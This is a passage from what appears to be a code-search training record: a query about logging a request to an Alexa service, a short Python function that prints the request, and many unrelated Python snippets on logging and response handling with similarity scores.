\" + response\n else:\n response = \"= \" + response\n self._log(\"<< \", response.rstrip())\n return result", "def process_response(response):\n # Print it and exit with 1 if operation wasn't successful\n print(response['message'])\n if response['status'] != 'success':\n sys.exit(1)", "def log(self, api, msg, level):\n return succeed(log.msg(msg, logLevel=level))", "async def _response_handler(self):", "def emit(self, record):\n data = self.mapLogRecord(record)\n client = Client()\n if self.method == 'GET':\n response = client.get(self.url, data)\n else:\n response = client.post(self.url, data)\n self.testcase.assertEqual(response.status_code, 200)\n self.testcase.assertContains(response, 'message saved')", "def on_response(self, response):\n pass", "def log_info(self, line):\n logging.info(\"Telemetry Logger - %s\" % line)", "def _log_request(self):\n log = self.server.log\n if log:\n if hasattr(log, \"info\"):\n log.info(self.format_request() + '\\n')\n else:\n log.write(self.format_request() + '\\n')", "def log(self,):\n if self.request.user.is_anonymous():\n self.fail()\n else:\n self.success()\n if conf.LOGIN_GUARD_FREQUENCY_ALERT_ON:\n self.alert()", "def print_response(response):\n print(f\"Response for {url}\")\n if response.status_code == 200:\n # Green text\n print(f\"\\033[1;32;40m {response.status_code} {response.reason}\\033[1;37;40m\")\n else:\n # Red text\n print(f\"\\033[1;31;40m {response.status_code} {response.reason}\\033[1;37;40m\")\n # print(response.json())\n print(f\" {response.elapsed.total_seconds()} seconds elapsed.\")", "async def handle_log(self, log):\n\t\tself.logger.log(log.level, str(log))", "def get_intent_response(date_start_slot,date_end_slot):\n print(\"here\",date_start_slot,date_end_slot) \n if date_start_slot != 'NA' and date_end_slot != 'NA':\n speechOutput = re.sub(' +',' ','Parsing error Logs from '+ date_start_slot + ' to '+date_end_slot)\n\n elif date_start_slot == 'NA' and date_end_slot != 'NA':\n speechOutput = 'Parsing error logs at '+date_end_slot\n\n elif date_start_slot != 'NA' and date_end_slot == 'NA':\n speechOutput = 'Parsing error logs at '+date_start_slot\n\n else:\n speechOutput = 'Start and end times are unrecognizable'\n \n return_value = parseLogs(date_start_slot,date_end_slot,dataframe)\n logs = return_value[0]\n stats = return_value[1]\n \n with open('logs.txt','w') as f:\n for each in logs:\n f.write(str(each))\n\n with open('log_stats.txt','w') as f:\n with open('log_numbers.txt','w') as f_new:\n for each_key,each_value in stats.items():\n f.write(\"Time : \"+str(each_key)+'\\t'+\"Number of logs : \"+str(len(each_value))+\"\\n\\n\")\n f_new.write(\"Time : \"+str(each_key)+'\\t'+\"Number of logs : \"+str(len(each_value))+\"\\n\\n\")\n for each_logs in each_value:\n f.write(each_logs+\"\\n\")\n f.write(\"\\n\\n\\n\\n\")\n\n os.system(\"nohup python send_mail.py &\")\n \n return response(speech_response(speechOutput, True))", "def on_trading_rsp_error(self, p_api, rsp_info, b_is_last):\n self._do_log({\n \"p_api\": p_api,\n \"rsp_info\": rsp_info,\n \"b_is_last\": b_is_last\n })", "def output(self, response: str):\n\n # Try to output through the prefered medium, but revert to\n # backup if need to and log any errors found, for example:\n # logging.error(\"Problem!\")\n\n IO.stdout(response)", "def event_handler(self, response):\n pass", "def _info(self, func):\n self.logger.info(\"llamando a %s\" % func)", "def decorator(fn):\n @functools.wraps(fn)\n def result(*args, **kwargs):\n request_time = datetime.datetime.now()\n 
actual_response = fn(*args, **kwargs)\n request = bottle.request\n response = bottle.response\n # modify this to log exactly what you need:\n logger.info('%s %s %s %s %s', request.remote_addr,\n request_time,\n request.method,\n request.url,\n response.status)\n logger.info('Cookies: %s', request.get_cookie('login'))\n logger.info('Handeled by: \"%s\" in file: \"%s\"', fn.__name__, SCRIPT_NAME)\n\n return actual_response\n return result", "def on_x(self):\r\n self.log()", "def dump_response_if_enabled(self, ecosystem, component, version, response):\n if self._dump_json_responses:\n try:\n self.dump_analysis(ecosystem, component, version, response.json())\n except Exception:\n self.print_error_response(response, \"error\")\n # not need to fail there - we'll fail later properly", "def handle_response(self, callback):\n\n self.log.info(\"Received callback for subscription %s\", self.service_id)\n self.log.info(callback)\n\n # handle callbacks\n self.handle_callbacks()", "def echo_handler(request):\n logger.debug('')\n return Response(200, 'OK', request.headers, request.body)", "def call_asr():\n\ttic = time.time()\n\treq = flask.request.data.decode(\"utf-8\")\n\taudio_arr = flask.json.loads(req)[\"data\"]\n\twav = np.array(audio_arr, np.float32)\n\t# normalize ([-1:1] normalization)\n\twav = normalize_audio(wav, method=\"-1_1\")\n\t# reduce noise (comment it to make ASR a bit faster)\n\twav = reduce_noise(wav, method=\"wiener\")\n\t# write the recorded audio (for debugging reasons)\n\t# wavfile.write(filename=\"recorded.wav\", rate=16000, data=wav)\n\t# transcribe the provided data\n\tout = asr_model.transcribe(wav)\n\ttoc = time.time()\n\tapp.logger.info(\"ASR Model Transcription: \"+out)\n\tapp.logger.info(\"ASR Duration: {} seconds\".format(toc-tic))\n\t# form response\n\tflask_response= app.response_class(response=flask.json.dumps({\"text\": out}),\n\t\t\t\t\t\t\t\t\t\tstatus=200,\n\t\t\t\t\t\t\t\t\t\tmimetype='application/json' )\n\treturn flask_response", "def log_bad_request_details(r):\n logger.info(\"Response status code: \" + str(r.status_code))\n logger.info(\"Response Details: \" + json.dumps(r.json()))\n logger.info(\"History: \" + str(r.history))\n logger.info(\"Cookies: \" + str(requests.utils.dict_from_cookiejar(r.cookies)))\n logger.info(\"URL: \" + str(r.url))\n logger.info(\"Links: \" + str(r.links))", "def log (self, bytes):\r\n if self.channel.addr:\r\n host = self.channel.addr[0]\r\n port = self.channel.addr[1]\r\n else:\r\n host = 'localhost'\r\n port = 0\r\n self.channel.server.logger.log (\r\n host,\r\n '%d - - [%s] \"%s\" %d %d\\n' % (\r\n port,\r\n self.log_date_string (time.time()),\r\n self.request,\r\n self.reply_code,\r\n bytes\r\n )\r\n )", "def main_response(self, data):", "def main_response(self, data):", "def _response_handler_callback(response):\n response_data = json.loads(response)\n if ('status' in response_data and response_data['status'] != 1) or ('status' not in response_data):\n Mixpanel.LOGGER.warning(\"Bad API response: \" + response)\n raise RuntimeError('Import or Update Failed')\n Mixpanel.LOGGER.debug(\"API Response: \" + response)", "def handle_login(self, request):\n self._verify_headers(request)\n self._verify_auth_parameters(request, check_session=False)\n data = self.responses['login']\n mlid = tags.uint32_tag('mlid', data.session)\n mlog = tags.container_tag('mlog', mlid)\n return web.Response(body=mlog, status=data.status)" ]
[ "0.6283806", "0.6229867", "0.60874593", "0.6051032", "0.6027314", "0.5980479", "0.5956262", "0.5953968", "0.5945938", "0.5923983", "0.57441443", "0.5655665", "0.5653018", "0.56518316", "0.5630625", "0.5618453", "0.5608918", "0.56035566", "0.55921704", "0.55480033", "0.5538451", "0.55379206", "0.5486825", "0.54689276", "0.54341245", "0.54104465", "0.5408528", "0.5402587", "0.53780717", "0.53780717", "0.53780717", "0.5376413", "0.5350587", "0.5332801", "0.5319971", "0.5319541", "0.5311664", "0.5304631", "0.52992135", "0.52818173", "0.52418476", "0.5219804", "0.5192488", "0.5174138", "0.51585615", "0.51438946", "0.5141974", "0.5141974", "0.51338667", "0.51324284", "0.51209444", "0.5115978", "0.5100702", "0.5082812", "0.508037", "0.5078187", "0.50750715", "0.5072481", "0.5071268", "0.5065299", "0.5048431", "0.5039845", "0.50358194", "0.5034273", "0.5027864", "0.50251675", "0.50229955", "0.50162995", "0.5011618", "0.501092", "0.5006098", "0.49976557", "0.49810588", "0.49671328", "0.49616092", "0.49556303", "0.49370673", "0.49340916", "0.49245846", "0.49216938", "0.49138254", "0.49104822", "0.4903079", "0.48958236", "0.48850498", "0.48796466", "0.48750958", "0.48696756", "0.48663345", "0.486125", "0.48592085", "0.48587832", "0.48451856", "0.48434722", "0.48357224", "0.48357224", "0.4832897", "0.48309457" ]
0.7056861
2
Log request to alexa service.
def log_request(handler_input):
    # type: (HandlerInput) -> None
    print("Alexa Request: {}\n".format(handler_input.request_envelope.request))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _log_request(self):\n log = self.server.log\n if log:\n if hasattr(log, \"info\"):\n log.info(self.format_request() + '\\n')\n else:\n log.write(self.format_request() + '\\n')", "def _log_request(res: SpamResult) -> None:\n _log.info(f\"requestId=[{request.id}] result=[{res.label}] reason=[{res.reason}]\")", "def onRequestStart(self, api, request):\n logging.info('Request start ({})'.format(request))", "def on_a(self):\r\n self.log()", "def __call__(self, request):\n request.start_time = time.time()\n\n response = self.get_response(request)\n\n log_data = self.extract_log_info(request=request, response=response)\n logger.info(log_data)\n\n return response", "def log_request(task_request, request):\n msg = \"{0.method} {0.url}: {0.body}\".format(request)\n log_info(task_request, msg)", "def log_request(self, r):\n\n token = r.headers.get(self.header, None)\n r.token = token\n self.requests.append(r)\n if r.token:\n self.log.debug('[%s] %s', token or '/', r.url)", "def log(msg):\n\tfrom http_request import req\n\tif not req: return\n\t\t\n\tif not req.out.get('_log'):\n\t\treq.out['_log'] = []\n\treq.out['_log'].append(msg)", "def attach_request_log(response):\n allure.attach(\n dump.dump_all(response).decode(\"utf-8\"),\n name=\"Full request log\",\n extension=\"txt\",\n )", "def add_logger(log, request):\n request.cls.log = log", "def access(self, resp, req, environ, request_time):\n if not (self.cfg.accesslog or self.cfg.logconfig or self.cfg.syslog):\n return\n\n msg = self.make_access_message(resp, req, environ, request_time)\n try:\n self.access_log.info(msg)\n except:\n self.error(traceback.format_exc())", "def log(self):\n\n\t\theader_dict = dict(request.headers)\n\n\t\ttry:\n\t\t\ttracker_id = header_dict[\"tracker_id\"]\n\t\texcept Exception:\n\t\t\ttracker_id = None\n\t\t\n\t\ttry:\n\t\t\tuser_agent = header_dict[\"User-Agent\"]\n\t\texcept Exception:\n\t\t\tuser_agent = None\n\n\t\ttry:\n\t\t\tlanguage = header_dict[\"Accept-Language\"]\n\t\texcept Exception:\n\t\t\tlanguage = None\n\n\t\ttry:\n\t\t\treferer = header_dict[\"Referer\"]\n\t\texcept Exception:\n\t\t\treferer = None\n\n\t\ttry:\n\t\t\torigin = header_dict[\"Origin\"]\n\t\texcept Exception:\n\t\t\torigin = None\n\n\t\ttry:\n\t\t\tjson_data = request.json\n\t\texcept Exception:\n\t\t\tjson_data = None\n\n\t\ttry:\n\t\t\tplatform = request.user_agent.platform.title()\n\t\texcept Exception:\n\t\t\tplatform = None\n\n\t\ttry:\n\t\t\tbrowser = request.user_agent.browser.title()\n\t\texcept Exception:\n\t\t\tbrowser = None\n\n\t\ttry:\n\t\t\tauth_header_token = header_dict[\"Authorization\"].split(\" \")[1]\n\t\texcept Exception:\n\t\t\tauth_header_token = None\n\t\t\n\t\t## If set to run before a request: This is the default setting\n\t\tif self.pre_request:\n\t\t\t@self.app.before_request()\n\t\t\tdef run():\n\t\t\t\t## If the path accessed is in the do_not_log list, it is skipped\n\t\t\t\tif request.path in self.do_not_log:\n\t\t\t\t\treturn\n\t\t\t\t## If the path accessed is not in the do_not_log list, it is posted\n\t\t\t\telse:\n\t\t\t\t\tpost_data = {\n\t\t\t\t\t\t\"error\": None,\n\t\t\t\t\t\t\"stack_trace\": None,\n\t\t\t\t\t\t\"method\": request.method,\n\t\t\t\t\t\t\"source_ip\": request.remote_addr,\n\t\t\t\t\t\t\"url\": request.url,\n\t\t\t\t\t\t\"status_code\": 200, ## Assumed to be 200 due to the nature of the function\n\t\t\t\t\t\t\"headers\": str(header_dict),\n\t\t\t\t\t\t\"user_agent\": user_agent,\n\t\t\t\t\t\t\"language\": language,\n\t\t\t\t\t\t\"platform\": platform,\n\t\t\t\t\t\t\"browser\": 
browser,\n\t\t\t\t\t\t\"referer\": referer,\n\t\t\t\t\t\t\"origin\": origin,\n\t\t\t\t\t\t\"auth_header\": auth_header_token,\n\t\t\t\t\t\t\"access_time\": datetime.now().strftime(\"%A, %d %B %Y %H:%M:%S\"),\n\t\t\t\t\t\t\"logging_access_key\": self.accessKey,\n\t\t\t\t\t\t\"json\": json_data,\n\t\t\t\t\t\t\"request_params\": str(dict(request.args))\n\t\t\t\t\t}\n\n\t\t\t\t\tself.startPost(post_data)\n\n\t\t\t\t\treturn\n\n\t\t\treturn run\n\t\t\n\t\t## If set to as a wrapper to a function\n\t\telse:\n\t\t\tdef log_decorator(func):\n\n\t\t\t\t@wraps(func)\n\t\t\t\tdef execute(*args, **kwargs):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tresult = func(*args, **kwargs)\n\n\t\t\t\t\t\tresult_response = make_response(result)\n\n\t\t\t\t\t\tpost_data = {\n\t\t\t\t\t\t\t\"error\": None,\n\t\t\t\t\t\t\t\"stack_trace\": None,\n\t\t\t\t\t\t\t\"method\": request.method,\n\t\t\t\t\t\t\t\"source_ip\": request.remote_addr,\n\t\t\t\t\t\t\t\"url\": request.url,\n\t\t\t\t\t\t\t\"status_code\": result_response.status_code,\n\t\t\t\t\t\t\t\"headers\": str(header_dict),\n\t\t\t\t\t\t\t\"user_agent\": user_agent,\n\t\t\t\t\t\t\t\"language\": language,\n\t\t\t\t\t\t\t\"platform\": platform,\n\t\t\t\t\t\t\t\"browser\": browser,\n\t\t\t\t\t\t\t\"referer\": referer,\n\t\t\t\t\t\t\t\"origin\": origin,\n\t\t\t\t\t\t\t\"auth_header\": auth_header_token,\n\t\t\t\t\t\t\t\"access_time\": datetime.now().strftime(\"%A, %d %B %Y %H:%M:%S\"),\n\t\t\t\t\t\t\t\"logging_access_key\": self.accessKey,\n\t\t\t\t\t\t\t\"json\": json_data,\n\t\t\t\t\t\t\t\"request_params\": str(dict(request.args))\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tself.startPost(post_data)\n\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tresult = func(*args, **kwargs)\n\t\t\t\t\t\t\n\t\t\t\t\t\ttrace = traceback.format_exc()\n\n\t\t\t\t\t\tkwargs = {\n\t\t\t\t\t\t\t\"trace\": trace,\n\t\t\t\t\t\t\t\"exception\": str(e)\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t\tpost_data = {\n\t\t\t\t\t\t\t\"error\": str(e),\n\t\t\t\t\t\t\t\"stack_trace\": trace,\n\t\t\t\t\t\t\t\"method\": request.method,\n\t\t\t\t\t\t\t\"source_ip\": request.remote_addr,\n\t\t\t\t\t\t\t\"url\": request.url,\n\t\t\t\t\t\t\t\"status_code\": 500,\n\t\t\t\t\t\t\t\"headers\": str(header_dict),\n\t\t\t\t\t\t\t\"user_agent\": user_agent,\n\t\t\t\t\t\t\t\"language\": language,\n\t\t\t\t\t\t\t\"platform\": platform,\n\t\t\t\t\t\t\t\"browser\": browser,\n\t\t\t\t\t\t\t\"referer\": referer,\n\t\t\t\t\t\t\t\"origin\": origin,\n\t\t\t\t\t\t\t\"auth_header\": auth_header_token,\n\t\t\t\t\t\t\t\"access_time\": datetime.now().strftime(\"%A, %d %B %Y %H:%M:%S\"),\n\t\t\t\t\t\t\t\"logging_access_key\": self.accessKey,\n\t\t\t\t\t\t\t\"json\": json_data,\n\t\t\t\t\t\t\t\"request_params\": str(dict(request.args))\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tself.startPost(post_data)\n\t\t\t\t\t\n\t\t\t\t\treturn result\n\t\t\t\t\n\t\t\t\treturn execute\n\t\t\t\n\t\t\treturn log_decorator", "def log_request(self, code='-', size='-'):\n response_time = self.request_time()\n if hasattr(code, 'value'):\n code = code.value\n self.log_message(\n '\"%s\" %s %s %.2fms',\n self.requestline, str(code), str(size), response_time,\n )\n logger.debug(\n \"method=%s url=%s status=%s handler=%s\"\n \" response_time=%s service=web\",\n self.http_method, self.log_data['url'], code,\n self.log_data['handler'], response_time,\n )", "def log_request(self, code='-', size='-'):\n pass", "def log_request(self, code='-', size='-'):\n if self.server.log_requests:\n BaseHTTPServer.BaseHTTPRequestHandler.log_request(self, code, size)", "def log_request(self, code='-', 
size='-'):\n print self._heading(\"HTTP Request\")\n #First, print the resource identifier and desired operation.\n print self.raw_requestline,\n #Second, print the request metadata\n for header, value in self.headers.items(): \n print header + \":\", value", "def log_request_response(task_request, response):\n log_request(task_request, response.request)\n log_response(task_request, response)", "def log(self, client_addr, request):\n with codecs.open(self.log_path, \"a\", 'UTF-8') as fh_out:\n print >> fh_out, (time.strftime('%Y-%m-%d %H:%M:%S') + \"\\t\" +\n ':'.join([str(i) for i in client_addr]) + \"\\t\" +\n request)", "def api_access_logging(\n request,\n endpoint,\n user_input,\n http_response_code,\n custom_error_code,\n api_version\n):\n aal = ApiAccessLog()\n\n aal.date = timezone.now()\n aal.url = request.get_full_path()\n aal.user = request.user\n aal.endpoint = endpoint\n aal.user_input = user_input\n aal.http_response_code = http_response_code\n aal.custom_error_code = custom_error_code\n aal.api_version = api_version\n\n try:\n ip = request.META['REMOTE_ADDR']\n aal.ip = ip\n except KeyError:\n pass\n\n try:\n referer = request.META['HTTP_REFERER']\n aal.referer = referer\n except KeyError:\n pass\n\n try:\n user_agent = request.META['HTTP_USER_AGENT']\n aal.user_agent = user_agent\n except KeyError:\n pass\n\n try:\n remote_host = request.META['REMOTE_HOST']\n aal.remote_host = remote_host\n except KeyError:\n pass\n\n try:\n remote_user = request.META['REMOTE_USER']\n aal.remote_user = remote_user\n except KeyError:\n pass\n\n aal.save()", "def log(self, request, response, time):\n try:\n fmt_info = self.colorize_atoms(\n self._format_line(request, response, time)\n )\n\n values = list()\n extra = dict()\n for key, value in fmt_info:\n values.append(value)\n\n if key.__class__ is str:\n extra[key] = value\n else:\n extra[key[0]] = {key[1]: value}\n\n self.logger.info(\n self.colorize_msg(\n str(response.status), self._log_format % tuple(values),\n ),\n extra=extra\n )\n\n except Exception:\n self.logger.exception(\"Error in logging\")", "def log_response(handler_input, response):\n # type: (HandlerInput, Response) -> None\n print(\"Alexa Response: {}\\n\".format(response))", "def log_response(handler_input, response):\n # type: (HandlerInput, Response) -> None\n print(\"Alexa Response: {}\\n\".format(response))", "def log_response(handler_input, response):\n # type: (HandlerInput, Response) -> None\n print(\"Alexa Response: {}\\n\".format(response))", "def addLogEvent(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def log_api():\n try:\n redis.zincrby(REDIS_LOG_KEY_NAME, 1, request.path)\n except RedisError as exc:\n return exc", "def log():\n data = {}\n log = {}\n log['dia'] = date.today().strftime(\"%d/%m/%Y\")\n log['info'] = ('Rooms IP: %s %s %s')%(request.remote_addr,request.method, request.url)\n data['data'] = log\n try:\n r = requests.post(uri, json=data)\n except requests.exceptions.RequestException as e:\n print(e)\n print(\"\\n\\nThe microservice Log is unvailable. 
The Log is %s.\"%(log['info']))\n else:\n if r.status_code == 200:\n print(\"Register Log was a success\")\n else:\n print(\"Register Log was an unsuccess\")", "def log(self, message):", "def emit(self, record):\n log_entry = self.format(record)\n try: \n requests.post(self.host+self.url, log_entry,headers={\"Content-type\": \"application/json\"}).content\n except Exception as e:\n if self.debug:\n print(e)", "def log(self, *args):\n self._check_private_key(\"log data\")\n params = {'private_key': self.privateKey}\n params.update(dict((k, self._encoder.serialize(v))\n for k, v in zip(self.fields, args)))\n response = self._post(self.inputUrl(), params=params)\n\n self._last_headers = response.headers\n self._stats = None", "def access(self, resp, req, environ, request_time):\n if not (self.cfg.accesslog or self.cfg.logconfig or self.cfg.syslog):\n return\n\n atoms = self.atoms(resp, req, environ, request_time)\n\n # wrap atoms:\n # - make sure atoms will be tested properly\n # - if atom doesn't exist replace it by '-'\n safe_atoms = self.atoms_wrapper_class(atoms)\n safe_atoms = self.colorize_atoms(safe_atoms)\n try:\n msg = self.cfg.access_log_format % safe_atoms\n self.access_log.info(self.colorize_msg(atoms['s'], msg))\n except:\n self.error(traceback.format_exc())", "def _addLogEntry(request, action, pagename, filename):\n from MoinMoin.logfile import editlog\n t = wikiutil.timestamp2version(time.time())\n fname = wikiutil.url_quote(filename)\n\n # Write to global log\n log = editlog.EditLog(request)\n log.add(request, t, 99999999, action, pagename, request.remote_addr, fname)\n\n # Write to local log\n log = editlog.EditLog(request, rootpagename=pagename)\n log.add(request, t, 99999999, action, pagename, request.remote_addr, fname)", "def log_requests(response):\n ts = strftime('[%Y-%b-%d %H:%M-%S]')\n\n logger.info('Flask: {0} {1} {2} {3} {4} {5}'.\n format(ts, request.remote_addr, request.method, request.scheme, request.full_path, response.status))\n\n return response", "async def _write_preflight_log(self, command_name, command):\n logging.info('Action submitted: [%s] [%s]', command_name,\n json.dumps(command))", "def _trace(self):\n self.__aceQLHttpApi.trace()", "def log_message(self, format, *args):\n logger.info(\"client: %s request: %s\"\n % (self.address_string(), format % args))", "def __init__(self, request, log=\"\"):\n self.log = log\n self.request = request", "def process_request(self, request):\n # Initialize thread local storage\n threadlocal.auditlog = {\n 'signal_duid': (self.__class__, time.time()),\n 'remote_addr': request.META.get('REMOTE_ADDR'),\n }\n\n # In case of proxy, set 'original' address\n if request.META.get('HTTP_X_FORWARDED_FOR'):\n threadlocal.auditlog['remote_addr'] = request.META.get('HTTP_X_FORWARDED_FOR').split(',')[0]\n\n # Connect signal for automatic logging\n if hasattr(request, 'user') and hasattr(request.user, 'is_authenticated') and request.user.is_authenticated():\n set_actor = curry(self.set_actor, user=request.user, signal_duid=threadlocal.auditlog['signal_duid'])\n pre_save.connect(set_actor, sender=LogEntry, dispatch_uid=threadlocal.auditlog['signal_duid'], weak=False)", "def log_request(req: 'flask_request', res: str) -> None:\n #raise Exception(\"Something awful just happened.\")\n #sleep(15)\n try:\n with UseDatabase(app.config['dbconfig']) as cursor:\n _SQL = \"\"\"insert into log\n (phrase, letters, ip, browser_string, results)\n values\n (%s, %s, %s, %s, %s)\"\"\"\n cursor.execute(_SQL, (req.form['phrase'],\n 
req.form['letters'],\n req.remote_addr,\n req.user_agent.browser,\n res))\n except ConnectionError as err:\n print('Is your database switched on? Error:', str(err))\n except CredentialsError as err:\n print('Is your credentials correct? Error:', str(err))\n except SQLError as err:\n print('Is your query correct? Error:', str(err))\n except Exception as err:\n print('Something went wrong:', str(err))\n return 'Error'", "def _log_throttled_access(self, request):\n request_method = request.method.lower()\n self._meta.throttle.accessed(self._meta.authentication.get_identifier(request), url=request.get_full_path(), request_method=request_method)", "def log_request(self, key, path, headers, body):\n\n if not body:\n body = {}\n # Build a dict with key, headers and body.\n now = datetime.datetime.now().isoformat()\n data = {'request_id': key, 'body': body, 'path': path, 'created': now}\n for k, v in headers.items():\n data[k] = v\n # Put to Dynamodb as a separated thread.\n threading.Thread(target=put_to_dynamodb, args=(data,)).start()", "def log(cls, request, action, arguments=None):\n al = cls(user=request.amo_user, action=action.id)\n al.arguments = arguments\n al.save()\n\n if not isinstance(arguments, (list, tuple)):\n arguments = (arguments,)\n for arg in arguments:\n if isinstance(arg, Addon):\n AddonLog(addon=arg, activity_log=al).save()\n elif isinstance(arg, UserProfile):\n # Index by any user who is mentioned as an argument.\n UserLog(activity_log=al, user=arg).save()\n\n # Index by every request user\n UserLog(activity_log=al, user=request.amo_user).save()", "def on_x(self):\r\n self.log()", "def enable_activity_log(self):\n self.add_payload('createActivityLog', 'true')", "def debug_requests_on():\n HTTPConnection.debuglevel = 2\n\n logging.basicConfig(filename='example1.log', filemode='w', level=logging.INFO, format='%(asctime)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p')\n logging.getLogger().setLevel(logging.DEBUG)\n\n requests_log = logging.getLogger(\"requests.packages.urllib3\")\n requests_log.setLevel(logging.DEBUG)\n requests_log.propagate = True", "def log_event(event):\n LOGGER.info(\"====================================================\")\n LOGGER.info(event)\n LOGGER.info(\"====================================================\")", "def on_start(self):\r\n self.log()", "def log(self, message: str):", "def logIt(self, astr, prefix=\" [D] \"):\n self.protocol.logIt(astr, prefix=prefix)", "def log(self, *args, **kwargs):\n self.game_view.log(*args, **kwargs)", "def log_access():\n # todo use project prefix\n tail('/var/log/nginx/access.log')", "def log(self, msg):\n\n\t\tself.eyetribe.log_message(msg)", "def log(self, reward, action):\n self.logs.append([reward, action])", "def LogData(\n serverName: str, pubIp: str, apiName: str, result,\n request: dict):\n log_id = str(uuid.uuid4())\n dateTime = str(datetime.today())\n if \"Image\" in request:\n request['Image'] = str(request['Image'])\n if \"File\" in request:\n request['File'] = str(request['File'])\n\n paramData = json.dumps(request)\n errorInfo = sys.exc_info()\n errorMessage = \"\"\n if errorInfo[2] is not None:\n errorMessage = f'Error at lineNumber: {str(errorInfo[2].tb_lineno)} {str(errorInfo[0])} {str(errorInfo[1])}'\n info = {\n \"log_Id\": log_id, \"ServerName\": serverName, \"DateTime\": dateTime,\n \"PublicIP\": pubIp, \"APIName\": apiName,\n \"Result\": errorMessage + str(result), \"ParameterData\": str(paramData)\n\n }\n logger = logging.getLogger(__name__)\n logger.info(f'{info}')\n return log_id", "def 
postLogging(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _log(self, message):\n pass", "def rest_api_log(self):\n with self.resource_lock:\n pass", "def log_event(event):\r\n tracker.send(event)", "def logtool(self, action, **options):\n pass", "def logevent(self, event, request = None, fields={}):\n # convert it to an event if its just a plain string\n if (isinstance(event, basestring)):\n event = EDebug(event,fields=fields)\n # add request field (if it wasn't already set in mevent)\n if (request != None):\n missingfields = { 'request': request }\n event.mergemissings(missingfields)\n # log it\n self.comp('logmanager').process(event)", "def log(self, trace: CallTrace) -> None:\n pass", "def create_audit_log_for_request(response):\n try:\n method = flask.request.method\n endpoint = flask.request.path\n audit_data = getattr(flask.g, \"audit_data\", {})\n request_url = endpoint\n if flask.request.query_string:\n # could use `flask.request.url` but we don't want the root URL\n request_url += f\"?{flask.request.query_string.decode('utf-8')}\"\n\n if method == \"GET\" and endpoint.startswith(\"/data/download/\"):\n flask.current_app.audit_service_client.create_presigned_url_log(\n status_code=response.status_code,\n request_url=request_url,\n guid=endpoint[len(\"/data/download/\") :],\n action=\"download\",\n **audit_data,\n )\n elif method == \"GET\" and endpoint.startswith(\"/login/\"):\n request_url = _clean_authorization_request_url(request_url)\n if audit_data: # ignore login calls with no `username`/`sub`/`idp`\n flask.current_app.audit_service_client.create_login_log(\n status_code=response.status_code,\n request_url=request_url,\n **audit_data,\n )\n except Exception:\n # TODO monitor this somehow\n traceback.print_exc()\n logger.error(f\"!!! Unable to create audit log! 
Returning response anyway...\")\n\n return response", "def on_L1(self):\r\n self.log()", "def log_process():\n global logger\n\n p = reqparse.RequestParser()\n\n # answer when requested as json in a post\n p.add_argument('tool_id' , type=str, location='json')\n p.add_argument('api_key', type=str, location='json')\n p.add_argument('message', type=str, location='json')\n \n # get passed params \n args = p.parse_args()\n\n args.setdefault('api_key','')\n args.setdefault('message','')\n args.setdefault('tool_id','')\n\n if (args['api_key'] != api_key):\n return log_respond(1,'api_key invalid')\n\n logger.info('tool_id:' + args['tool_id'] + ',' + args['message'])\n\n return log_respond(0,'ok: log posted')", "def _log(self, data):\n if self.log_data is not None:\n self.log_data(data)", "def getLogEvents(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def service_panel_eventlog(self, call):\r\n _LOGGER.debug(\"alarm control panel received event log request\")\r\n if type(call.data) is dict or str(type(call.data)) == \"<class 'mappingproxy'>\":\r\n code = \"\"\r\n if ATTR_CODE in call.data:\r\n code = call.data[ATTR_CODE]\r\n _LOGGER.debug(\"alarm control panel making event log request\")\r\n ##self.hass.data[DOMAIN][\"command_queue\"].put_nowait([\"eventlog\", self.decode_code(code)])\r\n if self.visprotocol is not None:\r\n self.visprotocol.GetEventLog(self.decode_code(code))\r\n # self.process_command([\"eventlog\", self.decode_code(code)])\r\n else:\r\n _LOGGER.debug(\"alarm control panel not making event log request %s %s\", type(call.data), call.data)", "def handle_error(self, request, error):\n self.log.error(\"An error occurred at request \" + repr(request) + \": \" + repr(error))", "def log_info(self, line):\n logging.info(\"Telemetry Logger - %s\" % line)", "def __call__(self, *args, **kwargs):\n self.logger.info(*args, **kwargs)", "def _logRequestArgs(self, request):\n\t\ttry:\n\t\t\tif request.args:\n\t\t\t\t# even if there are args, don't log them if only boring ones\n\t\t\t\t# were given\n\t\t\t\tfmtArgs = _formatRequestArgs(request.args)\n\t\t\t\tif fmtArgs!='{}':\n\t\t\t\t\tlog.msg(\"# Processing starts: %s %s\"%(request.path, \n\t\t\t\t\t\tfmtArgs))\n\t\texcept: # don't fail because of logging problems\n\t\t\tbase.ui.notifyError(\"Formatting of request args failed.\")", "def emit(self, record):\n data = getattr(record, 'synchrolog', {})\n if not data:\n return\n\n url = data.pop('url', None)\n\n if not url:\n return\n\n headers = {'Authorization': f'Basic {self.access_token}'}\n response = requests.post(url=url, json=data, headers=headers)\n if response.status_code >= 400:\n print('Could not send logging info to synchrolog server\\n\\n', response.text)", "def _log(log_fn, task_request, message):\n log_fn(\"{}: {}\".format(task_request.id, message))", "def setup_logfile():\r\n from core.general.appinit import log_init\r\n log_init(\r\n 'general',\r\n 'django_api'\r\n )", "def log(self,):\n if self.request.user.is_anonymous():\n self.fail()\n else:\n self.success()\n if conf.LOGIN_GUARD_FREQUENCY_ALERT_ON:\n self.alert()", "def trace(self, s):\n self.__aceQLHttpApi.trace(s)", "def _log_response(*, log_path: Path, ip_dict: Dict[str, int], response: Response) -> None:\n LOGGER.info(f\"logged request: {response.url}\")\n with log_path.open(mode=\"a\", encoding=\"utf-8\") as f:\n all_responses = [response]\n\n # Poll and wait for operations, if 
